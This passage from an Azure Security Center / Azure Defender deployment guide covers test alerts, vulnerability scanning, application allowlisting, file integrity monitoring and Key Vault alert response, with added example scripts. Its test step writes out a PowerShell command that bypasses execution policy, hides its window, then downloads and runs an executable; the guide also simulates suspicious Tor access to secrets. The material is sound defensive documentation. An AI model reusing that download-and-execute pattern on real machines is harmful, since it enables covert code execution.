machines that don't have Microsoft Defender for Endpoint configured recommendation.

Access the Microsoft Defender for Endpoint portal

1. Ensure the user account has the necessary permissions. Learn more.
2. Check whether you have a proxy or firewall that is blocking anonymous traffic. The
Defender for Endpoint sensor connects from the system context, so anonymous
traffic must be permitted. To ensure unhindered access to the Defender for
Endpoint portal, follow the instructions in Enable access to service URLs in the
proxy server.
3. Open the Microsoft Defender Security Center portal. Learn more about the portal's
features and icons, in Microsoft Defender Security Center portal overview.

Send a test alert

To generate a benign Microsoft Defender for Endpoint test alert:

1. Use Remote Desktop to access either a Windows Server 2012 R2 VM or a Windows
Server 2016 VM.
2. Create the folder C:\test-MDATP-test.
3. Open a command-line window.
4. At the prompt, copy and run the following command. The Command Prompt window
will close automatically.

powershell.exe -NoExit -ExecutionPolicy Bypass -WindowStyle Hidden (New-Object System.Net.WebClient).DownloadFile('http://127.0.0.1/1.exe', 'C:\\test-MDATP-test\\invoice.exe'); Start-Process 'C:\\test-MDATP-test\\invoice.exe'

The URL points at the local machine, so no real payload is fetched; the alert is raised on the
suspicious command line itself (hidden window, execution policy bypass, download and execute).

5. If the command is successful, you'll see a new alert on the Azure Security Center
dashboard and in the Microsoft Defender for Endpoint portal. This alert might take a few
minutes to appear.
6. To review the alert in Security Center, go to Security alerts > Suspicious PowerShell
CommandLine.
7. From the investigation window, select the link to go to the Microsoft Defender for
Endpoint portal.

Azure Defender's integrated vulnerability assessment solution

The vulnerability scanner included with Azure Security Center is powered by Qualys. Qualys'
scanner is one of the leading tools for real-time identification of vulnerabilities. It's only available
with Azure Defender for servers. You don't need a Qualys license or even a Qualys account -
everything's handled seamlessly inside Security Center.

A core component of every cyber risk and security program is the identification and analysis of
vulnerabilities.

Security Center regularly checks your connected machines to ensure they're running
vulnerability assessment tools.

When a machine is found that doesn't have vulnerability assessment solution deployed, Security
Center generates the following security recommendation:

A vulnerability assessment solution should be enabled on your virtual machines

Use this recommendation to deploy the vulnerability assessment solution to your Azure virtual
machines and your Azure Arc enabled hybrid machines.

Deploy the vulnerability assessment solution that best meets your needs and budget:

• Integrated vulnerability assessment solution (powered by Qualys) - Azure
Defender includes vulnerability scanning for your machines at no extra cost. You
don't need a Qualys license or even a Qualys account - everything's handled
seamlessly inside Security Center. This section provides details of this scanner and
instructions for how to deploy it.

Pre-requisites

Enabling Azure Defender's vulnerability assessment solution for Azure and hybrid machines
requires Azure Defender for servers to be enabled on the subscription.

Supported machines

• Azure and non-Azure machines running Windows and Linux
• Azure Arc machines

Required roles and permissions:

• Resource owner can deploy the scanner
• Security reader can view findings

Enable Azure Defender for Servers in Security Center's pricing and settings
page

Go to Security Center's Pricing & settings page, select the relevant subscription, and
enable Servers on the Azure Defender plans page.

Deploy the integrated scanner to your Azure and hybrid machines

1. From the Azure portal, open Security Center.
2. From Security Center's menu, open the Recommendations page.
3. Select the recommendation A vulnerability assessment solution should be enabled
on your virtual machines.

4. Choose the recommended option, Deploy ASC integrated vulnerability scanner,
and Proceed.
5. You'll be asked for one further confirmation. Select Remediate.
6. The scanner extension will be installed on all of the selected machines within a few
minutes.
7. Scanning begins automatically as soon as the extension is successfully deployed. Scans
will then run at four-hour intervals. This interval isn't configurable.

Adaptive Application Control

Adaptive application controls are an intelligent and automated solution for defining allow lists
of known-safe applications for your machines.

Security Center uses machine learning to analyze the applications running on your machines
and create a list of the known-safe software. Allow lists are based on your specific Azure
workloads, and you can further customize the recommendations using the instructions below.

When you've enabled and configured adaptive application controls, you'll get security alerts if
any application runs other than the ones you've defined as safe.

By defining lists of known-safe applications, and generating alerts when anything else is
executed, you can achieve multiple hardening goals:

• Identify potential malware, including malware that antimalware solutions might miss
• Improve compliance with local security policies that dictate the use of only licensed
software
• Avoid running old or unsupported applications
• Prevent specific software that's banned by your organization
• Increase oversight of apps that access sensitive data

Pre-requisites

Enabling Adaptive Application Controls requires Azure Defender for servers to be enabled on the
subscription.

Supported machines:

• Azure and non-Azure machines running Windows and Linux
• Azure Arc machines

Required roles and permissions:

• Security Reader and Reader roles can both view groups and the lists of known-safe
applications
• Contributor and Security Admin roles can both edit groups and the lists of known-safe
applications

Enable Azure Defender for Servers in Security Center's pricing and settings
page

Go to Security Center's Pricing & settings page, select the relevant subscription, and
enable Servers on the Azure Defender plans page.

Enable Adaptive Application Controls on a group of machines

If Security Center has identified groups of machines in your subscriptions that consistently run a
similar set of applications, you'll be prompted with the following recommendation: Adaptive
application controls for defining safe applications should be enabled on your machines.

You can select the recommendation, or open the adaptive application controls page to view the
list of suggested known-safe applications and groups of machines.

1. Open the Azure Defender dashboard and from the advanced protection area,
select Adaptive application controls.

2. Note that the Groups of VMs section contains several tabs:
Configured - Groups of machines that already have a defined allow list of applications.
For each group, the Configured tab shows:
• the number of machines in the group
• recent alerts
Recommended - Groups of machines that consistently run the same applications and
don't have an allow list configured. We recommend that you enable adaptive application
controls for these groups.
No recommendation - Machines without a defined allow list of applications, which
don't support the feature. Your machine might be in this tab for the following reasons:
• It's missing a Log Analytics agent
• The Log Analytics agent isn't sending events
• It's a Windows machine with a pre-existing AppLocker policy enabled by either a
GPO or a local security policy
Important: Security Center needs at least two weeks of data to define the unique
recommendations per group of machines. Machines that have recently been created, or
which belong to subscriptions that were only recently enabled with Azure Defender, will
appear under the No recommendation tab.

3. Open the Recommended tab. The groups of machines with recommended allow lists
appear.

4. Select a group.
5. To configure your new rule, review the various sections of the Configure application
control rules page and their contents, which are unique to this specific group of
machines:

A. Select machines - By default, all machines in the identified group are selected. Unselect
any to remove them from this rule.
B. Recommended applications - Review this list of applications that are common to the
machines within this group, and recommended to be allowed to run.
C. More applications - Review this list of applications that are either seen less frequently
on the machines within this group, or are known to be exploitable. A warning icon
indicates that a specific application could be used by an attacker to bypass an
application allow list (for example, a script interpreter that will run whatever code it is
given). We recommend that you carefully review these applications.

D. To apply the rule, select Audit.

Edit a group's adaptive application controls rule

You might decide to edit the allow list for a group of machines because of known changes in
your organization.

To edit the rules for a group of machines:

1. Open the Azure Defender dashboard and from the advanced protection area,
select Adaptive application controls.
2. From the Configured tab, select the group with the rule you want to edit.
3. Review the various sections of the Configure application control rules page as
described in Enable adaptive application controls on a group of machines.
4. Optionally, add one or more custom rules:
a. Select Add rule.

b. If you're defining a known-safe path, change the Rule type to 'Path' and enter a
single path. You can include wildcards in the path.
c. Define the allowed users and protected file types.
d. When you've finished defining the rule, select Add.
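As an added example (neither the guide's nor Security Center's own code) of what an audit-mode allow list with path rules does, the script below evaluates constructed process-start records against a set of path rules with wildcards, in the spirit of the Path rule type described above. Every execution that no rule covers produces an alert line, and executions of interpreters that happen to be covered by a broad rule are tagged, mirroring the warning icon that marks applications usable to bypass an allow list. The rule file format, the record format and the interpreter list are this example's own assumptions.

```shell
#!/bin/sh
# Added example (not from the guide): audit-mode application allowlisting over
# constructed exec records. Assumes POSIX sh; rules are shell glob patterns,
# one per line, '#' starts a comment. Exec records: "<host> <path>".
set -eu

# is_allowed PATH RULES: 0 if PATH matches any glob rule. The case statement
# does the wildcard matching, so "/usr/bin/*" behaves like a Path rule with a
# wildcard.
is_allowed() {
  while IFS= read -r rule; do
    case "$rule" in ''|'#'*) continue ;; esac
    # shellcheck disable=SC2254  # unquoted on purpose: $rule is a pattern
    case "$1" in $rule) return 0 ;; esac
  done < "$2"
  return 1
}

# is_bypass_tool PATH: interpreters and script hosts that let an attacker run
# arbitrary code *through* an allowed binary (assumed list for this example)
is_bypass_tool() {
  case "${1##*/}" in
    python*|perl|ruby|bash|sh|dash|node) return 0 ;;
  esac
  return 1
}

# audit_exec RECORDS RULES: one verdict per record
#   ALLOW <host> <path>        covered by a rule
#   ALLOW-WARN <host> <path>   covered by a rule, but a bypass-capable tool
#   ALERT <host> <path>        no rule covers it (the audit-mode alert)
audit_exec() {
  while read -r host path; do
    [ -n "$host" ] || continue
    if is_allowed "$path" "$2"; then
      if is_bypass_tool "$path"; then echo "ALLOW-WARN $host $path"; else echo "ALLOW $host $path"; fi
    else
      echo "ALERT $host $path"
    fi
  done < "$1"
}

work=$(mktemp -d)
trap 'rm -rf "$work"' EXIT

# Constructed allow list for a group of Linux web servers (audit mode)
cat > "$work/rules.txt" <<'EOF'
# group: linux-web
/usr/sbin/*
/usr/bin/*
/usr/lib/*
EOF

# Constructed process-start records, including the Tor Browser install from the
# simulation below and the logkeys launch from the attack scenario
cat > "$work/execs.txt" <<'EOF'
victimvm /usr/sbin/sshd
victimvm /usr/bin/apt-get
victimvm /usr/bin/python3.6
victimvm /opt/tor-browser/Browser/firefox
victimvm /tmp/logkeys
EOF

audit_exec "$work/execs.txt" "$work/rules.txt"
```

The ALLOW-WARN line is the point of the warning icon: a rule as broad as /usr/bin/* silently allows every interpreter under it, so an attacker who can drop a script anywhere writable gets code execution without ever running a non-allowlisted binary.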

Review and edit a group's settings

1. To view the details and settings of your group, select Group settings.

The pane shows the name of the group (which can be modified), the OS type, the location,
and other relevant details.

Important: The Enforce option, in the file type protection mode settings, is greyed out
in all scenarios. No enforcement options are available at this time; adaptive application
controls only audit and alert.

2. Modify the group's name or file type protection modes.
3. Select Apply and Save.
Respond to the "Allowlist rules in your adaptive application control policy
should be updated" recommendation

You'll see this recommendation when Security Center's machine learning identifies potentially
legitimate behavior that hasn't previously been allowed. The recommendation suggests new
rules for your existing definitions to reduce the number of false positive alerts.

To remediate the issues:

1. From the recommendations page, select the Allowlist rules in your adaptive
application control policy should be updated recommendation to see groups with
newly identified, potentially legitimate behavior.
2. Select the group with the rule you want to edit.
3. Review the various sections of the Configure application control rules page as
described in Enable adaptive application controls on a group of machines.
4. To apply the changes, select Audit.

Audit alerts and violations

1. Open the Azure Defender dashboard and from the advanced protection area,
select Adaptive application controls.
2. To see groups with machines that have recent alerts, review the groups listed in
the Configured tab.
3. To investigate further, select a group.
4. For further details, and the list of affected machines, select an alert.

Move a machine from one group to another

When you move a machine from one group to another, the application control policy applied to
it changes to the settings of the group that you moved it to. You can also move a machine from
a configured group to a non-configured group; doing so removes any application control rules
that were applied to the machine.

1. Open the Azure Defender dashboard and from the advanced protection area,
select Adaptive application controls.
2. From the Adaptive application controls page, from the Configured tab, select the
group containing the machine to be moved.
3. Open the list of Configured machines.
4. Open the machine's menu from three dots at the end of the row, and select Move.
The Move machine to a different group pane opens.
5. Select the destination group, and select Move machine.
6. To save your changes, select Save.

Simulate change for Adaptive Application Control policy and validate Security
Center alert

1. Log on to the target VM.
2. Download, install and run some software that was not on this machine before, for
example Tor Browser.
3. After a while you should see an alert similar to the one below:

File Integrity Monitoring

File integrity monitoring (FIM), also known as change monitoring, examines operating system
files, the Windows registry, application software, Linux system files, and more, for changes that
might indicate an attack.

Security Center recommends entities to monitor with FIM, and you can also define your own FIM
policies or entities to monitor. FIM alerts you to suspicious activity such as:

• File and registry key creation or removal
• File modifications (changes in file size, access control lists, and hash of the content)
• Registry modifications (changes in size, access control lists, type, and content)

FIM works by comparing the current state of these items with their state during the previous scan,
and alerts you if suspicious modifications have been made.

FIM uses the Azure Change Tracking solution to track and identify changes in your environment.
When file integrity monitoring is enabled, you have a Change Tracking resource of
type Solution. For data collection frequency details, see Change Tracking data collection details.
Important: If you remove the Change Tracking resource, you will also disable the file integrity
monitoring feature in Security Center.
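The comparison FIM performs, current state against the previous scan over content hash, size and permissions, can be reproduced in a few lines of shell. The script below is an added example, not the guide's code and not the Change Tracking solution's: it records a baseline for a directory tree, then reports files that were added, removed or modified, including a permission-only change that leaves the content hash untouched. It assumes GNU coreutils (sha256sum, stat -c) and paths without spaces; the directory tree and the changes are constructed for the example.

```shell
#!/bin/sh
# Added example (not from the guide): a minimal file integrity baseline/compare.
# Assumes GNU coreutils (sha256sum, stat -c) and file paths without spaces.
set -eu

# fim_baseline DIR OUT: one line per regular file under DIR:
#   <sha256> <size> <octal mode> <owner> <relative path>
fim_baseline() {
  ( cd "$1" && find . -type f | LC_ALL=C sort | while IFS= read -r f; do
      printf '%s %s %s\n' "$(sha256sum "$f" | cut -d' ' -f1)" "$(stat -c '%s %a %U' "$f")" "$f"
    done ) > "$2"
}

# fim_compare OLD NEW: prints ADDED/REMOVED/MODIFIED lines (empty if unchanged).
# A change in hash, size, mode or owner counts as MODIFIED, so a chmod on an
# unchanged file is still reported, as FIM does for ACL changes.
fim_compare() {
  awk '
    NR == FNR { old[$5] = $1 " " $2 " " $3 " " $4; next }
    { new[$5] = $1 " " $2 " " $3 " " $4 }
    END {
      for (f in old) if (!(f in new)) print "REMOVED " f
      for (f in new) {
        if (!(f in old)) print "ADDED " f
        else if (new[f] != old[f]) print "MODIFIED " f " (" old[f] " -> " new[f] ")"
      }
    }
  ' "$1" "$2" | sort
}

root=$(mktemp -d)
trap 'rm -rf "$root" "$root.baseline" "$root.current"' EXIT

# Constructed tree standing in for a server's monitored files
mkdir -p "$root/etc/ssh" "$root/usr/local/bin"
printf 'PasswordAuthentication yes\n' > "$root/etc/ssh/sshd_config"
printf 'listen=8080\n' > "$root/etc/app.conf"
printf '#!/bin/sh\necho hello\n' > "$root/usr/local/bin/app"
chmod 644 "$root/etc/ssh/sshd_config" "$root/etc/app.conf"

fim_baseline "$root" "$root.baseline"

# Simulated changes between two scans
printf 'admin_token=leaked\n' >> "$root/etc/app.conf"   # content change
chmod 600 "$root/etc/ssh/sshd_config"                  # permission-only change
printf 'x' > "$root/usr/local/bin/.cache"              # new file
rm "$root/usr/local/bin/app"                           # removed file

fim_baseline "$root" "$root.current"
fim_compare "$root.baseline" "$root.current"
```

Keep the baseline somewhere the monitored host cannot rewrite it; an attacker who can edit the baseline after modifying a file defeats the comparison, which is why the hosted solution stores the previous state in the workspace rather than on the machine.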

Pre-requisites

Enabling File Integrity Monitoring requires Azure Defender for servers to be enabled on the
subscription.

Supported machines

• Azure and non-Azure machines running Windows and Linux

Required roles and permissions:

• Workspace owner can enable/disable FIM
• Reader can view results

Enable Azure Defender for Servers in Security Center's pricing and settings
page

Go to Security Center's Pricing & settings page, select the relevant subscription, and
enable Servers on the Azure Defender plans page.

Enable FIM

Follow the steps below to enable FIM.

1. From the Azure Defender dashboard's Advanced protection area, select File integrity
monitoring.

2. The File integrity monitoring configuration page opens, displaying the number of
Windows and Linux machines under each workspace.
From here you can:
• Access and view the status and settings of each workspace
• Upgrade the workspace to use Azure Defender. This icon indicates that
the workspace or subscription isn't protected by Azure Defender. To use the FIM
features, your subscription must be protected by Azure Defender.
• Enable FIM on all machines under the workspace and configure the
FIM options. This icon indicates that FIM is not enabled for the workspace.

Important: If there's no Enable or Upgrade button and the space is blank, FIM is already
enabled on the workspace.
3. Select ENABLE. The details of the workspace, including the number of Windows and
Linux machines under the workspace, are shown.

The recommended settings for Windows and Linux are also listed. Expand Windows
files, Registry, and Linux files to see the full list of recommended items.

4. Clear the checkboxes for any recommended entities you do not want to be monitored by
FIM.
5. Select Apply file integrity monitoring to enable FIM.

Important: Once you enable FIM, it will take 15-20 minutes before changes are visible.

File Integrity Monitoring Dashboard

The File integrity monitoring dashboard displays for workspaces where FIM is enabled. The
FIM dashboard opens after you enable FIM on a workspace or when you select a workspace in
the file integrity monitoring window that already has FIM enabled.

The FIM dashboard for a workspace displays the following details:

• Total number of machines connected to the workspace
• Total number of changes that occurred during the selected time period
• A breakdown of change type (files, registry)
• A breakdown of change category (modified, added, removed)

Select Filter at the top of the dashboard to change the time period for which changes are
shown.

The Servers tab lists the machines reporting to this workspace. For each machine, the
dashboard lists:

• Total changes that occurred during the selected period of time
• A breakdown of total changes as file changes or registry changes

When you select a server under the Servers tab, Log Analytics opens.

When you select the Changes tab you can use the search option to find changes.

Edit monitored entities

The steps below guide you through adding or modifying monitored entities. Use them when you
need to edit change tracking of Windows Files, Linux Files and Windows Registry. For example,
you can:

• Enable (True) or disable (False) file integrity monitoring
• Provide or change the entity name
• Provide or change the value or path
• Add or delete the entity, discard the change, or save the change

Follow the steps below to add change tracking for a Windows Registry entity:

1. From the File Integrity Monitoring dashboard select Settings

2. Select Add in the Windows Registry tab

3. Enter the below information:

4. Save
5. Now, on a test machine, create and then modify the value, and monitor the FIM
dashboard for change notifications

* Registry notifications can take up to 50 minutes to be reflected in the FIM dashboard

Enable built-in recursive registry checks

The FIM registry hive defaults provide a convenient way to monitor recursive changes within
common security areas. For example, an adversary may configure a script to execute in
LOCAL_SYSTEM context by configuring an execution at startup or shutdown. To monitor
changes of this type, enable the built-in check.

Important: Recursive checks apply only to recommended security hives and not to custom
registry paths.

Add a custom registry check

FIM baselines start by identifying the characteristics of a known-good state for the operating system
and its supporting applications. For this example, we focus on the password policy
configurations for Windows Server 2008 and higher.

Example locations:

Policy Name                                                                   Registry Setting
----------------------------------------------------------------------------  ------------------------------------------------------------------------------------
Domain controller: Refuse machine account password changes                    MACHINE\System\CurrentControlSet\Services\Netlogon\Parameters\RefusePasswordChange
Domain member: Digitally encrypt or sign secure channel data (always)         MACHINE\System\CurrentControlSet\Services\Netlogon\Parameters\RequireSignOrSeal
Domain member: Digitally encrypt secure channel data (when possible)          MACHINE\System\CurrentControlSet\Services\Netlogon\Parameters\SealSecureChannel
Domain member: Digitally sign secure channel data (when possible)             MACHINE\System\CurrentControlSet\Services\Netlogon\Parameters\SignSecureChannel
Domain member: Disable machine account password changes                       MACHINE\System\CurrentControlSet\Services\Netlogon\Parameters\DisablePasswordChange
Domain member: Maximum machine account password age                           MACHINE\System\CurrentControlSet\Services\Netlogon\Parameters\MaximumPasswordAge
Domain member: Require strong (Windows 2000 or later) session key             MACHINE\System\CurrentControlSet\Services\Netlogon\Parameters\RequireStrongKey
Network security: Restrict NTLM: NTLM authentication in this domain           MACHINE\System\CurrentControlSet\Services\Netlogon\Parameters\RestrictNTLMInDomain
Network security: Restrict NTLM: Add server exceptions in this domain         MACHINE\System\CurrentControlSet\Services\Netlogon\Parameters\DCAllowedNTLMServers
Network security: Restrict NTLM: Audit NTLM authentication in this domain     MACHINE\System\CurrentControlSet\Services\Netlogon\Parameters\AuditNTLMInDomain

Important: To learn more about registry settings supported by various operating system
versions, refer to the Group Policy Settings reference spreadsheet.

Configure FIM to monitor registry baselines

1. From the File Integrity Monitoring dashboard select Settings

2. Select Add in the Windows Registry tab


3. Enter the following registry path:
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Netlogon\Parameters

Trigger Change Tracking

The steps below can be used to demonstrate change tracking by creating an autoexec.bat file on
the C: drive.

1. Log on to one of the machines attached to Security Center

2. If you can (outside of change control), modify or create the C:\autoexec.bat file: simply
add a comment and save the file.

3. A change notification should be displayed in the FIM dashboard within 30 minutes.

The following table shows the data collection frequency for the types of changes:

Change type        Frequency
----------------   ----------
Windows registry   50 minutes
Windows file       30 minutes
Linux file         15 minutes

More details are covered in the article: https://docs.microsoft.com/en-us/azure/automation/automation-change-tracking

View FIM change data using Log Analytics

File Integrity Monitoring data resides within the Azure Log Analytics
ConfigurationChange table set.

Set a time range to retrieve a summary of changes by resource. In the following
example, we are retrieving all changes in the last fourteen days in the categories of
registry and files:

ConfigurationChange
| where TimeGenerated > ago(14d)
| where ConfigChangeType in ('Registry', 'Files')
| summarize count() by Computer, ConfigChangeType

To view details of the registry changes:

1. Remove Files from the where clause.
2. Remove the summarization line and replace it with an ordering clause:

ConfigurationChange
| where TimeGenerated > ago(14d)
| where ConfigChangeType in ('Registry')
| order by Computer, RegistryKey

Reports can be exported to CSV for archival and/or channeled to a Power BI report.

2.5 Azure Defender for Key Vault


Azure Defender for Key Vault provides an additional layer of security intelligence. This tool
detects potentially harmful attempts to access or exploit Key Vault accounts. Using Azure
Defender's native advanced threat protection, you can address threats without being a security
expert, and without learning additional security monitoring systems.

When Security Center detects anomalous activity, it displays alerts. It also emails the
subscription administrator with details of the suspicious activity and recommendations for how
to investigate and remediate the identified threats.

Pre-requisites

To protect your Key Vault accounts you have to enable Azure Defender and Azure Defender for
Key Vault.

Enable Key Vault in Security Center's pricing and settings page

1. Go to Azure Security Center's Pricing & settings page, select the relevant subscription,
and enable Key Vaults in the Azure Defender plans page.

Create an Azure Key Vault and enable Azure Defender protection
1. Log on to the Azure Portal, go to Key Vaults and click the Add button to create a new Azure Key
Vault

2. Fill in the properties for the new Key Vault and click Review + create, then Create.

Create a new secret in the Key Vault

1. We need to issue a certificate to store in our Key Vault. Azure Key Vault can generate a
self-signed certificate natively, which is the fastest way.
2. Log on to the Azure Portal and switch to your Azure Key Vault. Click Secrets to switch to the
Secrets blade, then click the Generate/Import button.

3. Enter Name and Value for your secret, and leave all other values as is. Click Create.

Simulate a suspicious activity against Key Vault and check the Azure Security Center notification

1. To simulate a suspicious activity we can use Tor Browser. Download it on the Windows
machine you prepared before the delivery, open it, and log on to the Azure Portal.
2. Switch to Key Vaults, open your key vault, click Secrets, and retrieve the stored secret
by clicking the Show Secret Value button.

3. Wait a while and check Azure Security Center for an alert related to your Key Vault.

Note:
At the time of writing, Azure Security Center detects the following suspicious activities
(review the updated list of Key Vault alerts for the current set):

- Access from a TOR exit node to a Key Vault

- Suspicious policy change and secret query in a Key Vault

- Unusual user-application pair accessed a Key Vault

- Unusual application accessed a Key Vault

- Unusual user accessed a Key Vault

- Unusual operation pattern in a Key Vault

- High volume of operations in a Key Vault

- User accessed high volume of Key Vaults

Respond to Azure Defender for Key Vault alerts

When you receive an alert from Azure Defender for Key Vault, we recommend you investigate
and respond to the alert as described below. Azure Defender for Key Vault protects applications
and credentials, so even if you're familiar with the application or user that triggered the alert, it's
important to verify the situation surrounding every alert.

Every alert from Azure Defender for Key Vault includes the following elements:

• Object ID
• User Principal Name or IP Address of the suspicious resource

Tip
Based on the type of access that occurred, some fields might not be available. For example, if
your key vault was accessed by an application, you won't see an associated User Principal Name.
If the traffic originated from outside of Azure, you won't see an Object ID.

Step 1. Contact

1. Verify whether the traffic originated from within your Azure tenant. If the key vault
firewall is enabled, it's likely that you've provided access to the user or application
that triggered this alert.
2. If you can't verify the source of the traffic, continue to Step 2. Immediate
mitigation.
3. If you can identify the source of the traffic in your tenant, contact the user or
owner of the application.

Caution

Azure Defender for Key Vault is designed to help identify suspicious activity caused by stolen
credentials. Don't dismiss the alert simply because you recognize the user or application.
Contact the owner of the application or the user and verify the activity was legitimate. You can
create a suppression rule to eliminate noise if necessary. Learn more in Suppress alerts from
Azure Defender.

Step 2. Immediate mitigation

If you don't recognize the user or application, or if you think the access shouldn't have been
authorized:

• If the traffic came from an unrecognized IP Address:

1. Enable the Azure Key Vault firewall as described in Configure Azure Key Vault firewalls
and virtual networks.
2. Configure the firewall with trusted resources and virtual networks.

• If the source of the alert was an unauthorized application or suspicious user:

1. Open the key vault's access policy settings.


2. Remove the corresponding security principal, or restrict the operations the security
principal can perform.

• If the source of the alert has an Azure Active Directory role in your tenant:

1. Contact your administrator.


2. Determine whether there's a need to reduce or revoke Azure Active Directory
permissions.

Step 3. Identify impact

When the impact has been mitigated, investigate the secrets in your key vault that were affected:

1. Open the “Security” page on your Azure Key Vault and view the triggered alert.
2. Select the specific alert that was triggered. Review the list of the secrets that were
accessed and the timestamp.
3. Optionally, if you have key vault diagnostic logs enabled, review the previous
operations for the corresponding caller IP, user principal, or object ID.

Step 4. Take action

When you've compiled your list of the secrets, keys, and certificates that were accessed by the
suspicious user or application, you should rotate those objects immediately.

1. Affected secrets should be disabled or deleted from your key vault.
2. If the credentials were used for a specific application:
   1. Contact the administrator of the application and ask them to audit their
   environment for any uses of the compromised credentials since they
   were compromised.
   2. If the compromised credentials were used, the application owner should
   identify the information that was accessed and mitigate the impact.
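The decision path in Steps 1 and 2 above, as an added Python example that is not Microsoft's code: given the alert elements listed earlier (Object ID, User Principal Name, IP address), it checks the caller IP against a trusted network list and the Object ID against a principal inventory, and returns the mitigation branch the text prescribes for that situation. The inventory, the trusted networks, the has_aad_role attribute and the alert values are constructed assumptions; in practice they would come from your asset inventory, your Key Vault firewall rules and the alert itself.

```python
"""Triage helper for an Azure Defender for Key Vault alert.

Added example, not Microsoft's code. It encodes the decision path in
Steps 1 and 2 of the response procedure. The principal inventory, the
trusted network list and the alert values are constructed inputs.
"""
import ipaddress
from typing import Optional

# Constructed inventory: Object IDs your tenant knows, their owners, and whether
# the principal holds an Azure AD role (an assumed attribute, not an alert field).
KNOWN_PRINCIPALS = {
    "11111111-1111-1111-1111-111111111111": {"owner": "payments-app team", "has_aad_role": False},
    "22222222-2222-2222-2222-222222222222": {"owner": "it-admin", "has_aad_role": True},
}

# Constructed: the ranges you would list as trusted in the Key Vault firewall.
TRUSTED_NETWORKS = [ipaddress.ip_network("10.20.0.0/16"),
                    ipaddress.ip_network("203.0.113.0/24")]


def ip_is_trusted(ip: Optional[str], networks=TRUSTED_NETWORKS) -> bool:
    """Step 1: does the caller IP fall inside a network you already trust?"""
    if not ip:
        return False
    try:
        addr = ipaddress.ip_address(ip)
    except ValueError:  # malformed or missing field: treat as untrusted
        return False
    return any(addr in net for net in networks)


def triage(alert: dict, principals=KNOWN_PRINCIPALS, networks=TRUSTED_NETWORKS) -> dict:
    """Return the recommended response step for one alert.

    alert keys (the alert elements listed on the page; absent ones are None):
      ObjectId, UserPrincipalName, IpAddress
    """
    object_id = alert.get("ObjectId")
    ip = alert.get("IpAddress")
    principal = principals.get(object_id) if object_id else None

    # Unknown principal (or no Object ID, i.e. traffic from outside Azure per the Tip).
    if principal is None:
        if not ip_is_trusted(ip, networks):
            return {"step": "2", "contact": None,
                    "action": "Enable the Key Vault firewall and configure trusted "
                              "resources and virtual networks"}
        return {"step": "2", "contact": None,
                "action": "Open the key vault's access policy and remove or restrict "
                          "the security principal"}

    if principal["has_aad_role"]:
        return {"step": "2", "contact": principal["owner"],
                "action": "Contact your administrator; determine whether to reduce or "
                          "revoke Azure AD permissions"}

    # Recognised user or application: still verify, never dismiss (see Caution above).
    return {"step": "1", "contact": principal["owner"],
            "action": "Contact the owner and verify the activity was legitimate"}


if __name__ == "__main__":
    sample = {"ObjectId": None, "UserPrincipalName": None, "IpAddress": "198.51.100.7"}
    print(triage(sample))
```

The recognised-principal branch deliberately still returns a "contact and verify" action rather than "dismiss", matching the Caution above that the feature exists to catch stolen credentials used by accounts you know.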

2.6 Azure Defender for SQL Servers on Machines

The Azure Defender for SQL servers on machines plan detects anomalous activities
indicating unusual and potentially harmful attempts to access or exploit databases.

Once enabled, you will see alerts for suspicious database activities, potential
vulnerabilities, SQL injection attacks, and anomalous database access and query
patterns.

Pre-requisites

To protect your SQL servers, you have to enable Azure Defender and Azure Defender for SQL
servers on machines. Azure Defender for SQL servers on machines is available for SQL Servers
(all versions covered by Microsoft support).

Protected SQL versions:

• Azure SQL Server (all versions covered by Microsoft support)

Provision the Log Analytics agent on your SQL server's host

If your SQL server has not been on-boarded to Security Center you must provision the Log
Analytics agent in order for this exercise to work. You can search for the computer name in the
inventory page to verify if the SQL server has been on-boarded.

• SQL Server on Azure VM - If your SQL machine is hosted on an Azure VM, you
can enable auto provisioning of the Log Analytics agent. Alternatively, you can follow
the manual procedure for Onboard your Azure Stack VMs.
• SQL Server on Azure Arc - If your SQL Server is managed by Azure Arc enabled servers,
you can deploy the Log Analytics agent using the Security Center recommendation “Log
Analytics agent should be installed on your Windows-based Azure Arc machines
(Preview)”. Alternatively, you can follow the installation methods described in the Azure
Arc documentation.
• SQL Server on-prem - If your SQL Server is hosted on an on-premises Windows
machine without Azure Arc, you have two options for connecting it to Azure:
• Deploy Azure Arc - You can connect any Windows machine to Security Center.
However, Azure Arc provides deeper integration across all of your Azure
environment. If you set up Azure Arc, you'll see the SQL Server – Azure Arc page
in the portal and your security alerts will appear on a dedicated Security tab on
that page. So the first and recommended option is to set up Azure Arc on the
host and follow the instructions for SQL Server on Azure Arc, above.
• Connect the Windows machine without Azure Arc - If you choose to connect a
SQL Server running on a Windows machine without using Azure Arc, follow the
instructions in Connect Windows machines to Azure Monitor.

Enable SQL Servers on Machines in Security Center's pricing and settings page

Go to Azure Security Center's Pricing & settings page, select the relevant subscription, and
enable SQL servers on machines in the Azure Defender plans page.

Explore vulnerability assessment reports

The vulnerability assessment service scans your databases once a week. The scans run
on the same day of the week on which you enabled the service.

The vulnerability assessment dashboard provides an overview of your assessment results
across all your databases, along with a summary of healthy and unhealthy databases,
and an overall summary of failing checks according to risk distribution.

You can view the vulnerability assessment results directly from Security Center.

1. From Security Center's sidebar, open the Recommendations page and select the
recommendation Vulnerabilities on your SQL servers on machines should be
remediated (Preview)

2. Review the detailed report.

3. For more details, drill down:

• For an overview of scanned resources (databases) and the list of security
checks that were tested, select the server of interest.
• For an overview of the vulnerabilities grouped by a specific SQL database,
select the database of interest.

In each view, the security checks are sorted by Severity. Click a specific security check to
see a details pane with a Description, how to Remediate it, and other related
information such as Impact or Benchmark.

Azure Defender for SQL alerts
Alerts are generated by unusual and potentially harmful attempts to access or exploit SQL
machines. These events can trigger alerts shown in the Alerts for SQL Database and Azure
Synapse Analytics (formerly SQL Data Warehouse) section of the alerts reference page.

Explore and investigate security alerts

Azure Defender alerts are available in Security Center's alerts page, the resource's security tab,
the Azure Defender dashboard, or through the direct link in the alert emails.

1. To view alerts, select Security alerts from Security Center's menu and select an alert.
2. Alerts are designed to be self-contained, with detailed remediation steps and
investigation information in each one. You can investigate further by using other Azure
Security Center and Azure Sentinel capabilities for a broader view:

• Enable SQL Server's auditing feature for further investigations. If you're an Azure
Sentinel user, you can upload the SQL auditing logs from the Windows Security
Log events to Sentinel and enjoy a rich investigation experience. Learn more
about SQL Server Auditing.
• To improve your security posture, use Security Center's recommendations for the
host machine indicated in each alert. This will reduce the risks of future attacks.

Learn more about managing and responding to alerts.

2.7 Azure Defender Security Alerts Guide


Azure Defender has alerting capabilities that can help you identify threats in your environment;
the alerts you receive depend on the resources and services you're protecting with Azure Defender.

To learn how to respond to these alerts, see Manage and respond to security alerts in Azure
